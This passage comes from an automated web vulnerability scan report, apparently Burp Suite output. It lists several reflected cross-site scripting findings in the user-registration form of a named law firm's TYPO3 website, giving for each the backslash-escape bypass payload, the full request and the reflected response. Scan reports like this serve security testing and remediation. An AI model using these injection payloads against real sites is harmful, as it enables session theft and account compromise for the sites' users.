The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=01afa4\'%3balert(1)//fd66386815e&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:06 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
[telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateForm('fe_users_form','FE[fe_users][gender]','01afa4\\';alert(1)//fd66386815e');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_f
...[SNIP]...

4.177. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e75e\'%3balert(1)//0f9cda18802 was submitted in the FE%5Bfe_users%5D%5Bpassword%5D parameter. This input was echoed as 7e75e\\';alert(1)//0f9cda18802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=37e75e\'%3balert(1)//0f9cda18802&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:15 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27255

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith');
   updateForm('fe_users_form','FE[fe_users][password]','37e75e\\';alert(1)//0f9cda18802');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','3');
   updateForm('fe_users_f
...[SNIP]...

4.178. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bpassword_again%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bpassword_again%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60b0\'%3balert(1)//10f8d4d5446 was submitted in the FE%5Bfe_users%5D%5Bpassword_again%5D parameter. This input was echoed as b60b0\\';alert(1)//10f8d4d5446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3b60b0\'%3balert(1)//10f8d4d5446&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27309

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
teForm('fe_users_form','FE[fe_users][module_sys_dmail_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3b60b0\\';alert(1)//10f8d4d5446');
   updateForm('fe_users_form','FE[fe_users][0]','\'"-->
...[SNIP]...

4.179. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bstatic_info_country%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ccd4\'%3balert(1)//f8c734f430 was submitted in the FE%5Bfe_users%5D%5Bstatic_info_country%5D parameter. This input was echoed as 4ccd4\\';alert(1)//f8c734f430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG4ccd4\'%3balert(1)//f8c734f430&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27243

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG4ccd4\\';alert(1)//f8c734f430');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm('fe_users_form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_fo
...[SNIP]...

4.180. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Btitle%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Btitle%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 107b8\'%3balert(1)//d84ea8e71ea was submitted in the FE%5Bfe_users%5D%5Btitle%5D parameter. This input was echoed as 107b8\\';alert(1)//d84ea8e71ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3107b8\'%3balert(1)//d84ea8e71ea&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:43 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
_form','FE[fe_users][last_name]','');
   updateForm('fe_users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3107b8\\';alert(1)//d84ea8e71ea');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[
...[SNIP]...

4.181. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Busername%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Busername%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9168b\'%3balert(1)//a686935bb7e was submitted in the FE%5Bfe_users%5D%5Busername%5D parameter. This input was echoed as 9168b\\';alert(1)//a686935bb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith9168b\'%3balert(1)//a686935bb7e&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:52 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith9168b\\';alert(1)//a686935bb7e');
   updateForm('fe_users_form','FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_
...[SNIP]...

4.182. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzip%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzip%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae89\'%3balert(1)//e69150d97f4 was submitted in the FE%5Bfe_users%5D%5Bzip%5D parameter. This input was echoed as bae89\\';alert(1)//e69150d97f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3bae89\'%3balert(1)//e69150d97f4&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:27:04 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27286

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3bae89\\';alert(1)//e69150d97f4');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('f
...[SNIP]...

4.183. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzone%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzone%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54774\'%3balert(1)//0f6ddc84b8a was submitted in the FE%5Bfe_users%5D%5Bzone%5D parameter. This input was echoed as 54774\\';alert(1)//0f6ddc84b8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

